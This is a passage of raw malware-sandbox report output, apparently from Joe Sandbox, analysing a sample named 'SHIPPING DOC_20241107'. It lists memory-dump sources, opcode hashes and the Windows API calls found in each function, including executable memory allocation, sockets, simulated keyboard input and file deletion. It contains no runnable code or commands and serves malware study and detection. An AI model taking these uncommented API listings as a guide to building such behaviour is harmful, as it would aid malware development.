                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime__swprintf
                                                                                                                              • String ID: %.3d$WIN_XPe
                                                                                                                              • API String ID: 2070861257-2409531811
                                                                                                                              • Opcode ID: 7bb23668732a3bb08db143faab67152d491af28454b5bffe877bf68304080570
                                                                                                                              • Instruction ID: 2094573175c93278769dc6a1162ab1e8fadb44d43e0500424a3c8f071af5e0ac
                                                                                                                              • Opcode Fuzzy Hash: 7bb23668732a3bb08db143faab67152d491af28454b5bffe877bf68304080570
                                                                                                                              • Instruction Fuzzy Hash: 8DD017B1C4511DEACB40DBD18D899FA737CAB08310F648952FA06A2040E679CB84ABA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9f24dd0cc521f2c295c8b4f0e59f633b7422e73c118f5f8971824926781a89b1
                                                                                                                              • Instruction ID: dda7d799b674d898691638fb92d1e93a8d402eb80e801edfcded1254dcb90cff
                                                                                                                              • Opcode Fuzzy Hash: 9f24dd0cc521f2c295c8b4f0e59f633b7422e73c118f5f8971824926781a89b1
                                                                                                                              • Instruction Fuzzy Hash: 53C15D74E0421AEFCB14CF98D894EAEB7B5FF48714B118598E806EB291D731ED81CB90
                                                                                                                              APIs
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A2E1D2
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A2E215
                                                                                                                                • Part of subcall function 00A2D8B9: CharLowerBuffW.USER32(?,?), ref: 00A2D8D9
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A2E415
                                                                                                                              • _memmove.LIBCMT ref: 00A2E428
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3659485706-0
                                                                                                                              • Opcode ID: 2607e4af130b48dd6f17282b684cf036be1c0236306a575dddae4b3a006d4e0e
                                                                                                                              • Instruction ID: 7e95d24a309bef58071eb9a1b5edb3d159202881a66927c92be6154bcea98acd
                                                                                                                              • Opcode Fuzzy Hash: 2607e4af130b48dd6f17282b684cf036be1c0236306a575dddae4b3a006d4e0e
                                                                                                                              • Instruction Fuzzy Hash: 1FC16971A083119FC714DF28C580A6ABBE4FF89324F14896EF89A9B351D731E945CB82
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00A281D8
                                                                                                                              • CoUninitialize.OLE32 ref: 00A281E3
                                                                                                                                • Part of subcall function 00A0D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00A0D8E3
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A281EE
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A284BF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 780911581-0
                                                                                                                              • Opcode ID: 6de55b3f22d7cb2769d7d11fd3221009130b2c924a5c605a3526b3425225ee37
                                                                                                                              • Instruction ID: ddaffd50042ed5ccd7472d5ca7457ca38779d8d7cdefe7990d9923aa38161d12
                                                                                                                              • Opcode Fuzzy Hash: 6de55b3f22d7cb2769d7d11fd3221009130b2c924a5c605a3526b3425225ee37
                                                                                                                              • Instruction Fuzzy Hash: 18A159756147119FCB10EF58D985B6AB7E4BF88720F04845DFA9A9B3A2CB34ED04CB42
                                                                                                                              APIs
                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00A07A12
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A07A2A
                                                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 00A07A4F
                                                                                                                              • _memcmp.LIBCMT ref: 00A07A70
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 314563124-0
                                                                                                                              • Opcode ID: c8634c2cf357c08d49169426b2137fc62762ef71cb22d275ec088832d1477321
                                                                                                                              • Instruction ID: 8200ad001ec40fdb7892e415e0455dd5a6bbe1bd5c30cd9cc07f7f1e4565ee79
                                                                                                                              • Opcode Fuzzy Hash: c8634c2cf357c08d49169426b2137fc62762ef71cb22d275ec088832d1477321
                                                                                                                              • Instruction Fuzzy Hash: 6D811771E00109EFCB04DF94C984EEEB7B9FF89315F204598E506AB290DB31AE06CB60
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2808897238-0
                                                                                                                              • Opcode ID: 200920065266711198963cb46cd3eb1d7d486006e35b57900e3c9f638159969f
                                                                                                                              • Instruction ID: c3ef875227146f70a858f1e8825653c4e8a34ebd133318c6767ba124f77dbcc0
                                                                                                                              • Opcode Fuzzy Hash: 200920065266711198963cb46cd3eb1d7d486006e35b57900e3c9f638159969f
                                                                                                                              • Instruction Fuzzy Hash: 1351C530754B0A9BDB20AF65E891B6DF3F5EF48314F20982FE596CB2D1DB7098A08715
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(00B64378,?), ref: 00A39895
                                                                                                                              • ScreenToClient.USER32(00000002,00000002), ref: 00A398C8
                                                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00A39935
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3880355969-0
                                                                                                                              • Opcode ID: 7bdee42e97b95cfe1c15210982419062ef89080b65f01a0c86bcce9761e5f8f4
                                                                                                                              • Instruction ID: 4fc90f8732fe1d1dea0009adcd6fca138004a143d66a34959ddddb8c7aca1c35
                                                                                                                              • Opcode Fuzzy Hash: 7bdee42e97b95cfe1c15210982419062ef89080b65f01a0c86bcce9761e5f8f4
                                                                                                                              • Instruction Fuzzy Hash: 00514E34A00209EFDF14DF68D980AAF7BB6FF85320F148159F8599B2A0D770AD81CB91
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2782032738-0
                                                                                                                              • Opcode ID: 9d32a0cca31c7bb2b15b74915ad5c68f9b5270e2a37dcfa491c5b6f8e1a60b1a
                                                                                                                              • Instruction ID: b2ac9d1462480cde2be38046619305a7a35fa06dbec76d7c77d84e494bbd05d8
                                                                                                                              • Opcode Fuzzy Hash: 9d32a0cca31c7bb2b15b74915ad5c68f9b5270e2a37dcfa491c5b6f8e1a60b1a
                                                                                                                              • Instruction Fuzzy Hash: 01412630A84706AFDF188F6AC89196F7BAAAF807A0B24C63FE845D7740D770DD409B40
                                                                                                                              APIs
                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00A26AE7
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A26AF7
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A26B5B
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A26B67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2214342067-0
                                                                                                                              • Opcode ID: f2f607dd8fdc7b9be235bca7d473396d59d7d68ffb2b1f7f515d81536fc55456
                                                                                                                              • Instruction ID: 755b9df1cd1ed09ae4b33f3bb1bf33252402763f5849bacb938863b6a9fd7f2d
                                                                                                                              • Opcode Fuzzy Hash: f2f607dd8fdc7b9be235bca7d473396d59d7d68ffb2b1f7f515d81536fc55456
                                                                                                                              • Instruction Fuzzy Hash: 3F41B435750210AFEB10BF68DD86FBA77E99F44B24F448028FA5A9B2D2DA709C018791
                                                                                                                              APIs
                                                                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A3F910), ref: 00A265BD
                                                                                                                              • _strlen.LIBCMT ref: 00A265EF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _strlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4218353326-0
                                                                                                                              • Opcode ID: 194ac385841c2a33f9cd87a3a0a111c45d10e251acc75d6ff66bf05fb15e92bf
                                                                                                                              • Instruction ID: 86c4095c08e608feea65925321a66dfbd64d1f09fa00c5c502e0f29a73f42d86
                                                                                                                              • Opcode Fuzzy Hash: 194ac385841c2a33f9cd87a3a0a111c45d10e251acc75d6ff66bf05fb15e92bf
                                                                                                                              • Instruction Fuzzy Hash: 4D41A631901114AFCB18EBA8EED5FEEB7B9EF84310F148165F51997292DB30AD44C751
                                                                                                                              APIs
                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A1B92A
                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00A1B950
                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A1B975
                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A1B9A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3321077145-0
                                                                                                                              • Opcode ID: 56b41aad9f08ad2b2d14e2b24d4a76da920a8089c334ffbaf28d45677984449c
                                                                                                                              • Instruction ID: 1d8a042e90eb1220637cc7f32e4a88dd34ea9ef56334fe8ccf06fd2f0d975f40
                                                                                                                              • Opcode Fuzzy Hash: 56b41aad9f08ad2b2d14e2b24d4a76da920a8089c334ffbaf28d45677984449c
                                                                                                                              • Instruction Fuzzy Hash: 11412939610650DFCB11EF59C685A99BBF1EF89320B098488E94A9B762CB30FD41CB91
                                                                                                                              APIs
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A38910
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InvalidateRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 634782764-0
                                                                                                                              • Opcode ID: fd7fc2d90041300ec03f176bd247960618355eaa612a92951058a97064b3b164
                                                                                                                              • Instruction ID: 1a4ee4dac708d0a24476cb1d302cb41f3ff76d2a2dd82aaf817816ff85f83835
                                                                                                                              • Opcode Fuzzy Hash: fd7fc2d90041300ec03f176bd247960618355eaa612a92951058a97064b3b164
                                                                                                                              • Instruction Fuzzy Hash: FF31C234A01308BFEF219FA8CC45BBD3775EB06360F644515FA51E72E1CF79A9809A92
                                                                                                                              APIs
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00A3AB92
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A3AC08
                                                                                                                              • PtInRect.USER32(?,?,00A3C07E), ref: 00A3AC18
                                                                                                                              • MessageBeep.USER32(00000000,?,?,?,?,00A3C07E,?,?,?), ref: 00A3AC89
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1352109105-0
                                                                                                                              • Opcode ID: 059cd6640c9268bc0e4bd3b6fc2906e130c8b4c420f687debabe172320c95866
                                                                                                                              • Instruction ID: 18bc5d17a197e5092e8c22e9b8315e46d25fbd9aa8d231ed82d2fb673e234b43
                                                                                                                              • Opcode Fuzzy Hash: 059cd6640c9268bc0e4bd3b6fc2906e130c8b4c420f687debabe172320c95866
                                                                                                                              • Instruction Fuzzy Hash: EB417F30A00525DFCF11CF99C884A99BBF5FF69311F1891A9F4988B261D730E846DB92
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00A10E58
                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 00A10E74
                                                                                                                              • PostMessageW.USER32 ref: 00A10EDA
                                                                                                                              • SendInput.USER32(00000001,00000000,0000001C), ref: 00A10F2C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 432972143-0
                                                                                                                              • Opcode ID: c4026dc6efdb847bb6591132ba3af2e30792e91d09ad75f9ceeaeec559960b1c
                                                                                                                              • Instruction ID: ff43f8a44e02ab474ff520d4cfceccf0cce0edfb85a3aa474124236f41d03c11
                                                                                                                              • Opcode Fuzzy Hash: c4026dc6efdb847bb6591132ba3af2e30792e91d09ad75f9ceeaeec559960b1c
                                                                                                                              • Instruction Fuzzy Hash: AC313530940218AEFB34CB668C09FFABBB9EB88320F18461AF1D0561D1C3B589C69795
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00A10F97
                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 00A10FB3
                                                                                                                              • PostMessageW.USER32 ref: 00A11012
                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00A11064
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 432972143-0
                                                                                                                              • Opcode ID: ecafff07fe5e5cee0b6608ded5692daeb7e7ea40d9fe0e28498d2290a611f82c
                                                                                                                              • Instruction ID: 47e2e1b8b939af319f38fb007b436820720e3de1a0b2eec86587426f09201d23
                                                                                                                              • Opcode Fuzzy Hash: ecafff07fe5e5cee0b6608ded5692daeb7e7ea40d9fe0e28498d2290a611f82c
                                                                                                                              • Instruction Fuzzy Hash: 0A314930D40298EEFF34CB658C09BFABBB6AB4D311F04421AF595921D1C3B989D297A1
                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009E637B
                                                                                                                              • __isleadbyte_l.LIBCMT ref: 009E63A9
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009E63D7
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009E640D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3058430110-0
                                                                                                                              • Opcode ID: 93c9ace7d4614fa2b4522e5065c76a5763cc7f077ab1c63ff2435c8c4c2b81d6
                                                                                                                              • Instruction ID: fe510e6b5ad9de72fe9209a7f1e768ce6b6bf73f17651f3328cc4d3b74ba6dad
                                                                                                                              • Opcode Fuzzy Hash: 93c9ace7d4614fa2b4522e5065c76a5763cc7f077ab1c63ff2435c8c4c2b81d6
                                                                                                                              • Instruction Fuzzy Hash: 1131CD31600286EFDB26CF66CC84BAE7FA9FF55390F154529E8648B1A1E731EC50DB90
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 00A34F6B
                                                                                                                                • Part of subcall function 00A13685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A1369F
                                                                                                                                • Part of subcall function 00A13685: GetCurrentThreadId.KERNEL32(00000000,?,00A150AC), ref: 00A136A6
                                                                                                                                • Part of subcall function 00A13685: AttachThreadInput.USER32(00000000,?,00A150AC), ref: 00A136AD
                                                                                                                              • GetCaretPos.USER32(?), ref: 00A34F7C
                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00A34FB7
                                                                                                                              • GetForegroundWindow.USER32 ref: 00A34FBD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
